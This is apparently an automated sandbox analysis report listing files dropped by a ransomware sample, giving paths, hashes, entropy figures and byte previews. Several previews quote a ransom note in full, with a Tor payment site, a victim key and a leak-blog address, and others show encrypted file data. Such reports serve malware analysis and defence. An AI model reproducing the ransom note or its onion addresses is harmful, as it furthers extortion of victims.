                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingsconversions.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):532858
                        Entropy (8bit):7.996847021874977
                        Encrypted:true
                        SSDEEP:12288:RHa0CxoAwAjDN1TJ4WhgymczCHQ2WvuL6us0iq:VbADDJPgnZb63U
                        MD5:88B1AE4F20828BBDBA28284A3B24B16D
                        SHA1:199912A2C3576A26EF6CDF6511408F1DFDCC7BF4
                        SHA-256:06D078BBF8CE6B6F197019219AC79CB896AACEAC5D3FCA5AB4ACEEBE0E15AC2E
                        SHA-512:72CB3775618B200315F9242E8EAAF72B5EE25B1EDA501C011B5AC85E37F3DB4D630B6023075B6AF23839A17108F64003BE418EC8CB3A12A5593533F8AFB5DD58
                        Malicious:true
                        Preview:.`Y74......u,w.)./.....H.:.e.y.S..-.(..#J....-..g.+...t.L.;.r%...UG,U_....R...v|[.V.~.>.Oz..?Q.a.r.[d.c.+.....'..d....i.y..a.Ph.JK...u.\...b....C..e....Q~.....1.[.FHr...yU....H.r.e.W....:...E....2hFRU..O....rH.?t.T...Y3....\M..H. ^.h...-....a.r.O.+.."ST....x.$....p%U...y.@.t.o.{.qk....-.XS..>N.]7..J...e.........u....{..s.....V.....|..W...`...8..pw....LQ..D.qI.y.#.V.w.No.5.,6..<.0...t.....BS.......Jj..U.q,F..6GE.L....i..0..1v.y.B.:...8L......aV`...H..}......WK..U.wrl....O..JD.. gO.Z....C..h..@.T,...f.znxi......-6..jd...A`v..r.c.9.uAw.YR.G.....R..Cj...._Dg...?.I.,..xr......z>..8.....;.6<..9.uA6..^-iiQna{7...C.I.?ZQf......t.v9.;4..Co.T<R....C/X-.b....N..]..yn5..N...X.i..08A\.....t~Z.K7...!.7..D..7/z...-......[.....G{..oB.t.x1_:..e<1=7.....53...~.a..,...Yag)..o..41..@..g....X.L..~WA,.&..v...9.\.wJ......%z...lwW.[~'....'.Y.q......=.*...Ha.a3..D.].Fz....Ic.".".*,.....B....q..p...:..C%17.o....D.K..a./.Mu.'.}..Y.I.5.....m...,.J..#..F...,.EX.9.m%..._...Do..5.p&`

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{0f31ce30-ed3d-4588-b294-208da23711e6}\settingssynonyms.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):103825
                        Entropy (8bit):7.995590275674005
                        Encrypted:true
                        SSDEEP:1536:EEVGEOz0Mg6iQDnDjkLgeaeoY+z7Ql7fjnyE7OqNNpFAVPUDZB8cAK:bV7G46FDnXkcy+3aT7yqbNTmUDn8Q
                        MD5:4964D53F0E58AED65592ED5963A3DF14
                        SHA1:6F085026C8CE862DE9CA77E5C475BF78AC33BBEF
                        SHA-256:1C41CA9E7713A8E23A8DA0250569F5A2F7517B7333F5FD837D829535F615332F
                        SHA-512:D36051A7E76DA679F30C66902C09B975C7C9A947B0C220B6026F301DABB1C6E5B1A81FDD81EE7DFEB2193E0991708BED546A523D9946B7F76FBB5D07301F4804
                        Malicious:true
                        Preview:ZJ.~>e.A....U.u..../.V.|.z...n.tp.L..2......8.Z=.!^t&......no.7N.Q$..`..t.Y.hl....R......{*V....7%.._.N..../Ibb....O."l%3.?.O.p. .....u..BC.._..._..L'.<.........</.@.....u.,.,... ......pQH.._s....R...K....~.........'......O{.6.3.}nN.q.X...o..<Dm....(7....c..wM..7=..R..`..X..}W.9...z>...... d ..6xh;..F=).<L.... .B3..&..ue...(...=JrL....#..a\..+.&.,<R$~...+]Q.$........1...y. V...2 ...#..E....s..~....@O.....%.x...8...4.........3.V.T...&{...r..h&.IE...Y./.T.b.....'in.f..>]~z.=#|.^S....E,&-....j....`K..E.].0.D.%|........X.L|.-./......Q...;..wF..eK{1fu...U>r..F...b...d...0>.|.,...S.)...;...'.a.....ze..`e...l...Z...B.B.X%l-.HY.5..L....<.\..~.".@..W..iwX.h{.(B...<])..fl..;.......C.$...Ti...b..>%t...<^.SoI.b%..^...t.]A.....)ehFI7..z.....r...u.]..^y.v......+j...W.aD.. F.Q.W^..q....2...J,K2....j}..TH}.....e......b..{.jU.WY.Hu..-"|....k`..s.h50...:....L.e(...!7.D<G..2....|..N.O>....Qf..J.......L...:....... .D`.Q..b..A......\.?....V.x.19.B<]NI.w..h...Cq.!..!

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\0.0.filtertrie.intermediate.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):217626
                        Entropy (8bit):7.997437783046292
                        Encrypted:true
                        SSDEEP:6144:tBKMdKD6yczg9kS2dVwT9WMkZvm3aAbcuniwp17Owr:35ZP+2dV49WV52aAbcu5r
                        MD5:091D33D314B4771606E656533D2BE8E5
                        SHA1:3CAD8CCE8ABF90395AE46B3B342DD96C467860DA
                        SHA-256:5FB91B8C78A7018E1A357D712CE073D0AED1E34603272CACD6EB1379EB0BEEF2
                        SHA-512:00D0092AEBF8AFB921D7D7D85326D09883D3DF5C04BC8F2A75C9D2EFFB6DF55C902675A1B8730F3C1F168267CF6E06F3DEA5A9FBE87F56D3620CB4CE8A08D41D
                        Malicious:true
                        Preview:J.....G.&....@^/..u2q..|%.(.F}.....<...:.>T.F.r..w&Y..i...@......WvJ;h....Y.\....<h....m..U.R.$..6.../.....I...8.j.d...J.vC..Z.c.,....k..B....`.P.!5..J,...1..68.R.E8..D..T..Z...V.......9)....p...[.u....d........d.K...Si!..X ..C..8.a..._......L|..m\...G.q8............5...%..7.......5.Y.~.4G.<.:.T..iH.^.....;....8='.8B.p1.Nn..L.....i.Q....DU{...A9".H...5.al...........*........%..w.U..p.>..r.>lC....n.R....&..H...-.i.(33.9..{/.;i.&..-j....z..i....V.OY..U{.H..K.?y<.z.:bo...go.y.$...Z.J.X:O...m1..........t.X%n.....Yp......H6.....>.@...pZ.4.....N._.;.H.._.vkY.t.$y..}.~.F7...%..Q.O?..q.b.........`...&|.05."..}.!3lw,...}.dO/P.....!}..c...9.mnt/..Q...k|.|.wp`.P53...8u3g4.._.J... .....q.........f..>..u.(..L.uf8..8.....=.2W.....d.....o.d.,~-.&fi...J.`.b.B..u.ag..5......5....r.6F.j.VE.K0=.,...3.>..w..R+.\...F...i.....3.X........6X........@.Q.c..s*.?l..i.4..\....6.G.....>.3y....l*..0.j...#*l..^.e.\7....,..f6`.)...N....~..;@.F(...{4......p.......'.Z..#

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{76cc83ea-ae96-47fc-9329-459e5ad2d67b}\Settings.index

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1481960
                        Entropy (8bit):6.453940916190482
                        Encrypted:false
                        SSDEEP:24576:dyLjwAMyFjHUyF1SFfdx2jzmXB13PJkutgP2bEU7gTpDBWbhRmqkooR783lVKSuo:ujwAfN8PZXzufNfTpQkg3lVKSuo
                        MD5:80484FC0EC60D0A0F37050C50D6DB038
                        SHA1:DE7EA96F10CB854CE523A021A2EE2BA653261FEA
                        SHA-256:D741A4BF03FD69651D7DCB4E068A8A1E9DF3D63A08A822381DBAA84FD1BD5C02
                        SHA-512:425199DF04983004B782BB299D3AC0709E774128691CEED0D03D3CE594A271BD121C2FBF003A3216215A17055CD3091FCD9401605BBA7A3BFD17D962A7127084
                        Malicious:false
                        Preview:.Z....B...w...`....#.O..<.... ..P....E.w(..?....qS...V.~R.W...K.I....JQX......9...{..........>..BD...6o..T.+..<.y....w1.".J`.5O....M.2..xa..~.D3.{.....D|.e'..%..=..].l...!.....Z...cb.u..0..{.F_.[.....T...{T.M..;}g.X..{E.^8.A5uR`......D..2....Y.....Ko[.i.....k.mApA...L.%..D{?..TH.c...t..7.........@M'..-..1.w0#.%..E$.{....dW.C..A..:C....T.....'.F*E.b....*.M)Q..!.J.....E.mSwnC...(....h.s...H..i.JI...,.].If:B.E......>.|y4...j?.Z$...om...{$...#....J..1...Z.."..".|GV.)]...".W...D.w....".`L.c..u..../.t..^F.p...6b.7..*Et.G.0..-._5.i.....6>.w...H...t.@.S/I.0.....w...>J!...j......jw....+j.1...c(.{%.7g..A#....:V....pT.}\9....!....f.wG.\Ys.o.wJ.Q.......J...`.]hh8.w..?....p....5/......c.pYNm....6kQ.a.<.ENC....;nJ.O.R.Ag..K42."c........7...d...j...qTZ.c..?B...d(..)sk...J.d;|..s7p.....K..Z....bZu...O.(W-.X.fB{..%..2.1....,..h.d.L..#.n3.p..)p..[U.....Bul.)T.a..n.:q.W.......Ut.0)u....{..;.`.y.."...w..n.....g.".. +#EP.f.../.)5IW.M.Wvr.4!!...I.;...(C

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\0.0.filtertrie.intermediate.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):217626
                        Entropy (8bit):7.996623492488342
                        Encrypted:true
                        SSDEEP:6144:BTv7oyvZe0IyqB42chysBx/HvwjlfMIOxT4t//:B7IDChygHIfMIOV4N/
                        MD5:32C438AF5F7638BA4F5859F56BFF5768
                        SHA1:683EAA63B5467B29658C1FDCC07420C161963B1A
                        SHA-256:93573F06DFC56E7463CA7F5E45A37C654C29689D79E0843D5499D9A974597EED
                        SHA-512:C8204957C85D9587B78F2FB359FD8E5D946AEE9871D1EE47878AC40BE7AC88E1360FF9C4954B5A44D13F4C17E27195E45B0D691DCF70113E7682944F5FC9DE98
                        Malicious:true
                        Preview:.[..y.d}...2.tR....L..v.O0a.....+.&..2.;XD.i..s...j..^..Sh..e;...u^...@Y.,.XW...%....k...*..Ci..1.....J.Tk.[.....r.?B.?.k*.J0.......D.....V+....'91[..pm.#7.....{K...0~....a.X..@.#.WOQz..;2.....E......?...?.k.u`......O.....C#.&........v`.H.jL.`.c7...3'#.e.<.........,.RDs.|...;.'Y.....t.[!...gT....Y.8....e......@@...O.D)].O.$R.g.-eO.....'.....D...Nd.MkJ.}.'.83..p4 m.....aO..(.......Cem...t*.0l.r..".).*.g1:..0.V^.c._...j..)I..N...%[Y.?.....t.I..X..(..o..y..>.I.b....~l..Z>.}G.Z....K..Z...W.1d....9....{......H.0.(..xM.g.@.-.G.o....$.P8.....jr..R.: ...y.AU5...P....?|X.....@m.....D..."..@..qI.i0e..U.y..b...O.FW.......z......>u..<P...Pb.W.1._4..F.......(dX@.[.....L..9......u?..].q.S...`5.7,......n.U..Z..$..@.(i..".......&.....?U..Geo..<.(Z.s.\...f...aPm.+..n>..s,.<......Wv.c.T....wW.z.C:...b.p\...w..qL.`K'.A.0..!.N.=.?@.{!...v$.l........n..p...d5.,^W..*.."'....?...R..r.d...v...|.*..e..=..p...U....L..x~...l.}.+..-..#W....v".+T.... ..c.._TW..

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\Settings.ft

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):239312
                        Entropy (8bit):7.994266685504119
                        Encrypted:true
                        SSDEEP:6144:Q6xQJ4y6QKEnCzP0epnqcdcTVcNgpBvqoQf:t+J44KQPCxOVWEqH
                        MD5:D44CA9B6D69CF8C9407C2CF61B005A50
                        SHA1:8B8A4520E25D45AD76D5D58314F7108FFB2148AE
                        SHA-256:5C7227A39FD8FC5C4E2CD6A0C38500FFF20C7D2DD96C49C22F4B29569686ACF6
                        SHA-512:B6EB6086CBF987C3F0F505AAD9AF2804E440A4582BB5C74F496DFE025F1AA56EE8E2302BB3889CB26A949972C5CDD208D2748EC492657E54F7D2C6D2ED9309E7
                        Malicious:true
                        Preview:..LMxj....P4...@...P..4..9....Y.r.L.u.tjO0..y._...).)...!. .A.<....d..|.. .G......M~.Bk..~.3....._.R]8-FU.W.=}q.7...O.=,.:c..d.V..G..u....d....../B79.......!H.w......_0MB.`...m..Gc..B..z+....L....l.Y.oY.o...E.(..4..v....ps..r.@8..8U.QH....HI.[.;W..3w.......]W.Vo.:.h..J`<...0...........e.DrxC:.?.._C.Zq[*.....Q...}.....M}^. .....VXEH.,...@..~.B.....S4,.#...V..a.u:....:._..~G=-..F.v..<....H.....S..t;"......)d....m.3z0..VT...c._C.C.Y..,.".h..|...Mb<h...I&(.c.......D..L.. .E.}vU.....`.b.._.....f...n..}i.......fxl...W ...D...&iP/...Y.Z..s.....2.>.N..7pk.]...!...4'.......c.....0b.W'...C...@..6{.....J*$-.t..m.^...bw.[.Z...+|$O..Sk...23..4.s.....6.V.'.>.u.6m..8.N^AQ.K"R2.za..Ii.h$]......Uz...^...`.l.[8c...H....2.\7.a)MZ..O.;m; ...c...w.mnC.=`...w.....C...F.?...L..:....=-V.9.x......!..:.z.X?.j.....I...N+.r`.N }..,....i ..].......O...%....B..'i......Ox.bu...vl..1.J.&#....a.<L....k{.. .y.l.Sy.A.Wt.{..>u..........+R.ysem..\.q...... .z.G.}8..u

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{97b27011-f8cc-4ac9-9531-d6ee8ce92324}\Settings.index

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1481960
                        Entropy (8bit):6.460251238600011
                        Encrypted:false
                        SSDEEP:24576:h7DCFjnMGzL/TKF2ozBfLljrHA6Ttcyw2bEAAn1L/BuHmqkVx3bzM3lVKSuc:s7/OfTlPHApN3n1LLzM3lVKSuc
                        MD5:2BF78B0F8E664F4C19833523BBDE1A4D
                        SHA1:F88587F954E9EEC2228C7DDFAC02E5C14D1BF19D
                        SHA-256:72225C73862CD286C7E4466407A8B073EC424014BEC1B6CE5A45D58228B5AC00
                        SHA-512:87804058520E1F6406016937E2AE744427DC1EC772F1DDA0C57C9A080C40C2EEB6916CEFA7B37E67CA754DEEA09730CB702B0E1166C7F3340F3E34914B6B087A
                        Malicious:false
                        Preview:.`[O......xb...U..I..q...Y..km./.'.Y~...........v..9C*n..<...G.;y;......(...j........0<.....j.s....+g.4m..?.6...tM...M..4.....F.\....A.1....F*......u......ksG:..O...9..h.<......f..|...[..X...4.......~.AD..&......Y...70J.S..A.5..]..J......W..k....p.|.~K{qHCRe~g..X.z@..|..h.U......j..7.$G...Nk{.G.U4...s.,g...E.c....s(.} .MT<9.......c<!?.WA<.i}._5K....)a.W.OA...]R....N...........[...QR..m.-..m.c.$.3.....s..]...N..w,A<...u4.O.......kA.*p.2H|.c.uV}..u.l.zV%.jZ'.`bt....f.....GMr;<=^X#.&.$.6..X.G...m.".QA.h.[.1...HdX....Z..a..L...H.......<L%@..|.a4O.".D...Y.R.n...".|.X...>%..A=....0'N*"&Nr.aA)......c..p..a"8....>0..........!.._..k]q..0".....c..`..&..m t.1.[.N.'.R....^.z...*.L....V.......siG.n..f,....b..)9..-...".D0.-.Ao..Q|..r....U.>SH....cSy .......d.....=FQ.eM...|.'Hoy.}R50....b.9z..1...Yc..c.Y......W..)W..XV?$i..R..o..F...@..h.......W.0)T...G.?.......X#...8....!..Q.r..m...._."a......oX.e..z..N.Y...x.*..?Y....] ...!.km... T....8.....?.9..\.)._.

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903167889885.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):105711
                        Entropy (8bit):7.98979760209393
                        Encrypted:false
                        SSDEEP:3072:ueViTluOFQVQmZINDEkNDrCMAivCdvWTs3Znld6:ueVixeZIRZ4/dvWiVlc
                        MD5:562A4F3DD56DB23CA16AE49776085E7B
                        SHA1:20EA26AAB5CA26333E2EFDB0F1606273ADEE8BBE
                        SHA-256:FC6E55BC2A4B785E2EA503F99F71C86709BBC336508D37AE068A7B67CFE8445B
                        SHA-512:6ED32B9CAF7942F082F9D04893F85E1BBAEDF40CE460FE4E591FC5A7068088B1A132B42E8D417B46C3A069C1B5F637BA13971A4BF8638EC47DB2A3463683B5FC
                        Malicious:false
                        Preview:...H.}...+8...2.'.,d.w4...h.?M......5..:H..\.D,`O]c@.^,t....O-.....)...\..../Q..d.v.`....5u..Y..Qj6.WD.U..H.....0#=..[.@....7k.._....v.A, [.U.s;.jS|.-.I...........5{....%}.H.".....gX.......$..c\.%..=CW..$.A...US.v.gs|^.../.f...6Tl......z.{bF...\..M.@.l.!...M...%.......D.r.Q&.zE.....PmX......>...&).6.E.#.~y.....pVe).S&.q..e...2..G:!...m.......=g"I.ex..sD).."..._n..N<^]..}..8..w....l.._<.0#\....5kZ.q]2/fR....Qc..4..X........-.L.u7..R...J...p.N.....2C...rv..7..g.@.X..Jfrpx.?....Wn.Z~d.~...([#...}....h.Y...C..d.Z.\R.5\.DC.T....."...3-..=.s%...&.-...y@~....=e.9..........6........%.."..t....<n.P=..xx....W...;..b..|.l....C..\.q.W.ImX....~-7.J..\3`....<d.........s.f)....$.......T-.`).x.w..n..g.M.#.).-]..-cuD....k.q.e..&.$...j.b./...~r..b...%n.F.T..;.....Z...o,.>.E....L.._A....S.wlD...4%....a....`......k8*.1.nh.X.o.......c.S.V.~k..f./.r......r.%^..w...5.i.h....h.YPy ER.T.Z.w.z#.w"o..MB.J..=$.$C.-.Eg..W...QIo{.....M....X....Ms...$.k.....5..y

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408903214673664.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):105711
                        Entropy (8bit):7.988902345620645
                        Encrypted:false
                        SSDEEP:3072:zdBE25o6axLD1hV02iWJLG2gJF7tlvZBJN:zdBx5o5v02iWRGDlxB/
                        MD5:4F6B55641DA13106D663E3DC1A5579D5
                        SHA1:0F6D0A80B5EE27EB5A61CE6447C67FC1B9AECED1
                        SHA-256:0291D89C288CFE71916128FBDEEB946BA7EC0B5FF556ACCCE7F2FE59A47EC7E9
                        SHA-512:1474FA48CE9F2BCF2D14671EF9FBFA7BF6AA6F1F4787C81814B89FE7B0F45667589CDAD1688B106AB27F787878C4F0CA704F7E209E0176615F6BFC70EA94F060
                        Malicious:false
                        Preview:...-.|..7a.108S...t...E..%...?...q#..5.........w.(..7..]....#...............]..F...|p..!...&.5..sp>...y.]..L.l;4.!X?...T ~n.....`..-....s...)J..u'.L.#Q..s..R.X.`..we5.....lK.E.1[.....U0.E.=.;u<u.1.6i..g(...2A...'..Z.Ct9...'..D\..%.1.Ee....3.{..,.x.j.J.s4..kGn..@..(.e"z.L.........,..K..k.-.p..4....l(.......r...dCb...0.J...T.l#y...w......1-v-.5*..9..T..lY..D%.n-..1....M....5.f..[6.j...}2.A.4I..K...g4......Q.p#I.../.A.x...E...U...Jb..........O...u.}p.......P|.F.4.....$..9...u.wa .z..G)~......]..:..4n8-q.x...X}!.}W|E_.|ZM]Y...#1...9.4W..{[..4')X7.....l..-...&^..N...$.....9.N..7.......|.SZ......O.B2....{.k.3"~/...h.....@.olS..xAO.\.7 H..8.X..}$;.t32....6j.......q..!U.....$)....:..`e.l..@P...U...e......t.^.'.<..(..G.Q......?<cc.ym...f<..|...t..2.+.6......5.k..H..............m...vzqSh....S.D.....+.6G..J.yH...^........jH..1.......:23V-D...5.me.U....V.X.<.........m*?..@.3.Q..'..f.3......W.....E.(j..\;.J'..gi.fZ....`.SHQ\b........:vqA.....u

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408904996229952.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):118301
                        Entropy (8bit):7.991130891601682
                        Encrypted:true
                        SSDEEP:3072:/9hHfvXEeOXFraWaat7R/VshyVbzy4Hl3rUVWwYeFKc:/9hHfvXjOXpaWaU7R/VOyVK4HlbUgwYM
                        MD5:473EB0B849ACB70808ADB934140E1FAE
                        SHA1:D86A72494AC0D80CD87ABAEDE8DCE3458EBEEADC
                        SHA-256:1E155897B781697D052CA00D59317AC698388E38422899D7AD7EAC8C19CB17DF
                        SHA-512:60E21171435F5B86C04B730ADF31E56611662D0493B79B542BF9F50B3FC552DF45308C8640411E0ABD919657CD52821CD79D54A96075340489411E758A61CD92
                        Malicious:true
                        Preview:.jj....B.~..}x...H.;.`.....e....c._..?...!.......D.............F..}.....!.F.?.*.E.R.(..y}?zk\.......+.@x.%..x.VMA|.a2+.PE,.,[z ....Z..."E.?..jqR.......W.......B....,c.r*.fw....#.c.q=..Y...$Po3..4#./...|;.F.W.2....;....7..1u.!....J&.q..:..c.?....pv...9..........u...v.}.x.K...).UY.Z.];..(w3/..:....o......TNm....7q..U.............TF.g. K,T.6...X..n,c....1.).....a....K.9.7OV.,......!....v.".G.......X..r."?..}.......@{TQ...4.,M/.%d..._2....S..?Y..*.....8u........T...._.2...0.jS+....2$.+..}N......o....;....j/..%.AttN-F..;..$.+...dgpE.d.{...CF.;...)..f./..2......+..-V.K...Z.q.5./..nm...8iBg.Sj.....g3F.f..N.2V....-.C..U.c.FT..$..=.1..m......{N...#.|z././.\O|.s..w].sx.Y.?.ob....l~.V...*.e.....N=.E....z!$..".n.3..f....-<j[pC..^.}.mW............/....Uy..#..F.m.wKJ.b...qFGT..u.R....1#.....l.w....4.......2..[(]i...].......M.S..J.5r.....dk.If.........jK.x.......>$.A..v..@.:...O...z.}."VO...O...ImE..y..FZ...!..@..y...M..ZMZ..i..m....'./...t.=.6......:..#..

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906321630689.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):118301
                        Entropy (8bit):7.992290479258472
                        Encrypted:true
                        SSDEEP:3072:h5oobWugA8oCyPZWEXMMq7FaNjNSshIKZ:fqugA8opLdSENjNVd
                        MD5:2A13C5E6657CE556B16BD7E7B035434C
                        SHA1:1E27EA5CCE2AD4FB1D09DFDCE02835633D661650
                        SHA-256:9E16E6EF0D5025288ADDA2B7DAE3ABE05B8F8C574A1BC8453DA6413B2A223774
                        SHA-512:41DFFA6E3C30EDD133F4466293F44596E54CDAD4C4E8D131097239C0B3B29BBE157E83FC4EF613E08BCF4F98D16C1DC4F4BF1AB8A637BB02D26ED38EC2443430
                        Malicious:true
